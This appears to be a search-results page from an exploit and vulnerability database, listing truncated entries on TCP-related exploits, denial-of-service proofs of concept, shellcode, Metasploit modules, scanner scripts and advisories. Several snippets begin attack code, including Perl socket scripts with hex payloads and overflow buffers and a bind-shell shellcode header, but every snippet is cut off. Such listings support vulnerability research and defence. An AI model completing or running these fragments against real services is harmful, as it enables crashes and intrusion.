165 matches found
TCP ACK Firewall Scanner
Map out firewall rulesets with a raw ACK scan. Any unfiltered ports found means a stateful firewall is not in place for them. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'TCP ACK Firewall...
Sami HTTP Server 2.x - 'HEAD' Remote Denial of Service
!/usr/bin/perl Sami HTTP Server v2.x Remote Denial of Service with HEAD request. -------------------------------------------------------------------- The vulnerability is caused due to an error in handling the HEAD command. This can be exploited to crash the HTTP service...
DNS Server Detection (TCP)
TCP based detection of a DNS server. SPDX-FileCopyrightText: 2009 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription scriptoid"1.3.6.1.4.1.25623.1.0.108018";...
Windows/x86 (NT/XP/2000/2003) - Bind TCP (8721/TCP) Shell Shellcode (356 bytes)
Windows/x86 NT/XP/2000/2003 - Bind TCP 8721/TCP Shell Shellcode 356 bytes. Shellcode exploit for Windowsx86 platform ; Title: Win32 Bind Shell ; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 ; Function: Listen for connection and spawn command shell ; Author: hdmatmetasploit.co...
FTP Now 2.6 Server Response Remote Crash PoC
Exploit for unknown platform in category dos / poc ============================================ FTP Now 2.6 Server Response Remote Crash PoC ============================================ !/usr/bin/perl By Dr.Pantagon www.deltasecurity.ir DeltaSecurityCenter Special Tnx D7J AND H!V++ FTP Now versio...
mIRC 6.34 - Remote Buffer Overflow (PoC)
mIRC 6.34 - Remote Buffer Overflow PoC Mirc 6.34 Remote Buffer Overflow This poc allow you to own the 2 first EDI & EDX bytes. To become remote, add a simple document.location.href=irc://server.com/... in some html page use IO::Socket; sub sock my $sock=new IO::Socket::INET Listen = 1, LocalAddr ...
fhttpd 0.4.2 - un64() Remote Denial of Service
fhttpd 0.4.2 - un64 Remote Denial of Service !/usr/bin/perl Jeremy Brown [email protected]/http://jbrownsec.blogspot.com http://www.fhttpd.org / fhttpd-0.4.2.tar.gz WARNING: VERY OLD Program received signal SIGSEGV, Segmentation fault. 0x0804b42d in un64 s=0x809b2d2 "" at util.cc:69 69 ifc2!=-...
FreeBSD Security Advisory (FreeBSD-SA-05:15.tcp.asc)
The remote host is missing an update to the system as announced in the referenced advisory FreeBSD-SA-05:15.tcp.asc SPDX-FileCopyrightText: 2008 E-Soft Inc. Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders...
BigAnt Server 2.2 Buffer Overflow
This module exploits a stack buffer overflow in BigAnt Server 2.2. By sending a specially crafted packet, an attacker may be able to execute arbitrary code. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class...
IPS-1 TCP Protocol Updates
The TCP protocol has undergone updates for maintenance purposes...
wireshark security update
CentOS Errata and Security Advisory CESA-2007:0066-01 New Wireshark packages that fix various security vulnerabilities are now available. Wireshark was previously known as Ethereal. This update has been rated as having low security impact by the Red Hat Security Response Team. Wireshark is a...
CVE-2007-0959
Cisco PIX 500 and ASA 5500 Series Security Appliances 7.2.2, when configured to inspect certain TCP-based protocols, allows remote attackers to cause a denial of service device reboot via malformed TCP packets...
firefox-DoS.txt
!/usr/bin/perl author: tomas kempinsky use strict; use Socket; my $port = shift || 2121; my $proto = getprotobyname'tcp'; my $payload = "\x32\x32\x30\x20\x5a\x0d\x0a\x33". "\x33\x31\x20\x5a\x0d\x0a\x35\x30". "\x30\x20\x44\x6f\x53\x0d\x0a\x35". "\x30\x30\x20\x5a\x0d\x0a"; socketSERVER, PFINET,...
A new bandwidth attacks-vulnerability warning-the black bar safety net
This document Copyleft owned skipjack all, use the GPL release, you can freely copy, reprint, reproduced keep the documents for completeness, it is strictly prohibited for any commercial purposes. Email: [email protected] Source: http://skipjack.cublog.cn The idea is to...
acFTP FTP Server 1.4 - USER Remote Buffer Overflow (PoC)
acFTP FTP Server 1.4 - USER Remote Buffer Overflow PoC ===== acFtpd BoF Crash Exploit ===== There is a Buffer overflow at the USER command in acFtpd. Vuln found by: Preddy RootShell Security Group Usage: acdos.pl use IO::Socket; use Win32; use strict; my$i = ""; my$socket = ""; my $overflow = "A"...
OCE 3121/3122 Printer (parser.exe) Denial of Service Exploit
Exploit for hardware platform in category dos / poc ============================================================ OCE 3121/3122 Printer parser.exe Denial of Service Exploit ============================================================ !/usr/bin/perl OCE 3121/3122 Printer DoS Exploit...
The Trojan client and server covert communication analysis-vulnerability warning-the black bar safety net
Modern Trojan horse to achieve is to establish in a reliable, but also easy to be the host found the communications program on the, this article is about the various programmes implemented method, the reliability, the safety made some theoretical discussion. Full understanding of Trojan horse...
Rookie Edition Expliot the guidelines for the preparation of the PNP the overflow vulnerability analysis+exploit-vulnerability warning-the black bar safety net
A month ago, and chat with friends, talked about now on the network, worms, viruses are increasingly rampant, the year before the“shock wave”, last year's“shock wave”, this year also don't know and out of what? The voice just fell, the one is named Zotob worm has been in a 8 on 1 to 5 November...
Acunetix HTTP Sniffer Denial of Service Exploit
Exploit for unknown platform in category dos / poc =============================================== Acunetix HTTP Sniffer Denial of Service Exploit =============================================== !/usr/bin/perl Acunetix HTTP Sniffer DOS Exploit ------------------------------------ Infam0us Gr0up -...
FTPshell Server 3.38 - Remote Denial of Service
FTPshell Server 3.38 - Remote Denial of Service !/usr/bin/perl Usage: FTPShellFTPDOS.pl FTPShellFTPDOS.pl 127.0.0.1 hello moto FTPshell Server Version 3.38 Download: http://www.ftpshell.com/ use IO::Socket; use Win32; use strict; my$i = ""; my$socket = ""; for $i = 1; $i newPeerAddr = $ARGV0,...